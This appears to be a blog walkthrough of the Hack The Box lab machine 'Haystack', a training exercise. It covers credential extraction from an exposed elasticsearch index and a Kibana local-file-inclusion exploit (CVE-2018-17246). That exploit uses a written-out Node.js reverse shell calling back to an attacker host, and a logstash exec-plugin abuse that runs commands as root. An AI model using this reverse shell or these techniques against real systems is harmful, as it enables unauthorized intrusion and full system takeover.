Haystack – hackthebox.eu walkthrough

This is a walkthrough of the machine Haystack on hackthebox.eu, which most users found frustrating and/or annoying. Personally I would describe it as a somewhat annoying box, and although it is rated as easy, in my opinion at least the privilege escalation part falls more into the intermediate category. First, add the box to your hosts file:

cat >> /etc/hosts <<< "<target-ip> haystack.htb"

Enumeration and Running Services

nmap -sC -sV --reason --top-ports 10000 haystack.htb
Scanning the top ten thousand ports of the machine reveals an SSH service on port 22, a web server (nginx) on port 80, and an additional nginx web server on port 9200 with the interesting "DELETE" method enabled. The SSH banner responds with "SSH-2.0-OpenSSH_7.4", so the exact OS version on the box can hardly be determined precisely, but one thing to note here is that this particular version of the openssh package is susceptible to SSH username enumeration attacks [exploit].

Going further, the box reveals an image on the web server on port 80. This looks like a CTF box: a front page with nothing but a picture of a needle in a haystack (or any single nonsensical picture at all) usually means there is either hidden information within its metadata, or it is meant to be used for a reverse image search. In this case it is a hidden hint within the metadata: reviewing the image with the "strings" utility shows a base64 string at the end, and decoding it yields a hint written in Spanish. According to Google Translate, "la aguja en el pajar es la clave" means "the needle in the haystack is the key".

In addition to this, the web server on port 9200 turns out to be the elasticsearch API, which is part of the ELK Stack:
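The technique can be simulated locally. The snippet below builds a stand-in file (a few non-printable bytes plus the Spanish hint, re-encoded to base64 by me for illustration; on the box you would run the same pipeline against the image downloaded from port 80):

```shell
# Stand-in for the real image: non-printable bytes followed by an appended
# base64 blob, just like the image on the box
printf '\377\330\377\340 fake jpeg data\n' > /tmp/needle.jpg
echo 'bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==' >> /tmp/needle.jpg

# strings pulls out printable runs; the base64 blob is the last one
strings /tmp/needle.jpg | tail -n 1 | base64 -d   # la aguja en el pajar es "clave"
```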
elasticsearch – ELK Stack – haystack.htb:9200

Exfiltration of data

From this point you could either use dirbuster/gobuster, or take a smarter, more targeted approach and list all indices of elasticsearch. This is something you either know beforehand, or it requires some research within the elasticsearch documentation and on the ELK stack overall.
How to show all indices on elasticsearch (ELK Stack)
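Listing the indices is a single request against elasticsearch's _cat API:

```shell
# Show all indices; ?v adds a header row for readability
curl -s 'http://haystack.htb:9200/_cat/indices?v'
```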
So what we have is three indices: .kibana, quotes, and bank. An additional point worth noting is that simply requesting the /quotes index within the elasticsearch API would not show all the records, which was one of the box's traps. In order to get the full list of records and values, you have to tell the server explicitly using the size parameter, which I found out about from the following stackoverflow comment: https://stackoverflow.com/a/32832160

So to get the top 1000 records of the quotes index, you make the following query: http://haystack.htb:9200/quotes/_search?size=1000 An alternative, somewhat messier way would be to search across all indices and pass the size parameter: http://haystack.htb:9200/_search?size=1000

To filter all of this and avoid reading through every quote, I piped the output through jq and then used GNU grep to search for "key" or "clave":
curl -sL http://haystack.htb:9200/quotes/_search?size=1000 | jq '.' | grep 'key\|clave'
So what we now have is two base64 values, found in quotes containing the term "clave", which is Spanish for "key". Let's see what they decode to:
elasticsearch data exfiltration: user: security pass: spanish.is.key
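For reference, the decoding step is just base64 -d; the two strings below are the credentials re-encoded by me, standing in for the values grepped out of the quotes:

```shell
# Decode the two base64 values pulled from the "clave" quotes
echo 'dXNlcjogc2VjdXJpdHkg' | base64 -d         # user: security
echo 'cGFzczogc3BhbmlzaC5pcy5rZXk=' | base64 -d # pass: spanish.is.key
```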
which leads us to

Remote Code Execution / SSH shell

And those are the credentials: logging in via SSH with the credentials exfiltrated from elasticsearch works:
Getting a shell on target “haystack” – hackthebox.eu walkthrough – d7x – PromiseLabs blog
A regular user with uid and gid 1000 with no sudo privileges.
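The login itself is straightforward:

```shell
# SSH in with the credentials recovered from elasticsearch
ssh security@haystack.htb   # password: spanish.is.key
# once on the box, confirm who we are
id                          # uid=1000(security) gid=1000(security) ...
```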

Privilege Escalation

Here's the second trap on the box: enumerating the system in detail shows that there is a kibana service user and group within /etc/passwd and /etc/group: And as the netstat command is missing on the server (which seemed suspicious), we need other ways to list the listening ports.

Alternatives to netstat for showing listening ports

ss -nptl          # listening TCP sockets with owning process; ss -nutl adds UDP
cat /proc/net/tcp # raw kernel socket table (addresses and ports in hex)
lsof -i           # open network connections per process
What we can see here is the kibana service running locally on port 5601. Another way to find the port kibana is running on is to look at its configuration file at /etc/kibana/kibana.yml. Running curl indeed shows the kibana service up on localhost:

As logstash is running as root, and the logstash daemon allows for command execution through its exec plugin, we are aiming for access to the /etc/logstash/conf.d directory, which belongs to the root user and the kibana group: the first thing we have to do is get access to the kibana user. Then we can alter the logstash configuration (a grok filter feeding an exec plugin) to execute a command with elevated privileges.

The kibana service is prone to a Local File Inclusion, described in CVE-2018-17246 and originally published by CyberArk: "A Local File Inclusion in Kibana allows attackers to run local JavaScript files". Following that article, it is a bit of trial and error from here on. My initial, cautious test was a script that simply created a file in the /tmp directory.

I found something specific while working on this box which was not quite explained in CyberArk's article, and I am not sure whether it's the box that behaves this way for some unknown reason, or whether it is actually intended: in order to bring the LFI to execution, you first have to query cli.js using the following command:
curl "http://localhost:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=./../../cli_plugin/cli.js"
The service may become unresponsive/broken after a few tries; instead of getting a shell, you then have to request the cli.js plugin again and call for your shell once more. It may take several tries until you get the "No response from server" message, and if you mess something up you may need to revert the box and start over, so be careful. Another thing I found out is that after a revert you have to wait a while and check whether the kibana service has actually started, simply by querying it with curl:
curl http://localhost:5601
If you get no response, you have to wait longer (it may take up to 5 minutes, so be patient). Here is the code of the .js shell, followed by changing its permissions so it is readable and executable by everyone:
cat > /tmp/shell.js <<'EOF'
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/bash", []);
    var client = new net.Socket();
    // connect back to the attacker machine; the IP is redacted here,
    // fill in your own address
    client.connect(4444, "", function(){
        client.pipe(sh.stdin);   // our keystrokes go to the shell
        sh.stdout.pipe(client);  // shell output comes back to us
        sh.stderr.pipe(client);
    });
    return /a/; // prevents the node process from crashing
})();
EOF
chmod 777 /tmp/shell.js
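shell.js connects back on port 4444, so before triggering it, start a listener on the attacking machine:

```shell
# Catch the reverse shell (port must match client.connect in shell.js)
nc -lvnp 4444
```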
My methodology was as follows:
  1. Check whether the kibana service has started: curl http://localhost:5601 If you do not get a response, you need to wait longer. If you get some javascript code looking like the following:
    [security@haystack ~]$ curl http://localhost:5601
    <script>var hashRoute = '/app/kibana';
    var defaultRoute = '/app/kibana';
    var hash = window.location.hash;
    if (hash.length) {
    window.location = hashRoute + hash;
    } else {
    window.location = defaultRoute;
    }</script>
    Then you are good to go;
  2. curl "http://localhost:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../cli_plugin/cli" Try this several times until you get the following response: curl: (52) Empty reply from server
  3. curl "http://localhost:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../tmp/shell.js" You may get a "connection refused" response. Try several times, waiting a few seconds between attempts, until you get a shell:
    Privilege Escalation on “haystack” phase 1 – getting a shell using kibana’s service privileges
    Now we are able to modify the logstash configuration:
logstash configuration: filter.conf
logstash configuration: input.conf and output.conf
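The pipeline shown in the screenshots looks approximately like this (a reconstruction based on the grok pattern and the behavior described in this walkthrough; exact option values on the box may differ):

```
# /etc/logstash/conf.d/input.conf -- polls any file matching /opt/kibana/logstash_*
input {
  file {
    path => "/opt/kibana/logstash_*"
    start_position => "beginning"
    sincedb_path => "/dev/null"
    stat_interval => "10 second"
    type => "execute"
  }
}

# /etc/logstash/conf.d/filter.conf -- captures everything after "Ejecutar comando:"
filter {
  if [type] == "execute" {
    grok {
      match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
    }
  }
}

# /etc/logstash/conf.d/output.conf -- runs the captured command (as root)
output {
  if [type] == "execute" {
    exec {
      command => "%{comando} &"
    }
  }
}
```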
What this means is that whenever the grok filter matches the pattern "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" within a file named /opt/kibana/logstash_* (the star can be replaced by anything), it will execute the captured command with the privileges of the running logstash daemon, i.e. root. So now all we have to do is create a file named, for example, /opt/kibana/logstash_0 and wait for the result. Cautious as before, the first thing I tried was copying /etc/passwd into the /tmp directory instead of going straight for a shell, which I will skip in this post to keep the information consistent.
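A minimal trigger file along those lines (the copy is the harmless test just mentioned; any command after the trigger phrase works):

```shell
# The grok pattern strips the "Ejecutar comando:" prefix, and logstash's exec
# output runs the remainder as root on its next polling interval
echo 'Ejecutar comando: cp /etc/passwd /tmp/passwd' > /opt/kibana/logstash_0
ls -l /tmp/passwd   # once executed, the copy shows up owned by root
```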
Getting root on haystack – d7x – PromiseLabs blog – hackthebox.eu walkthrough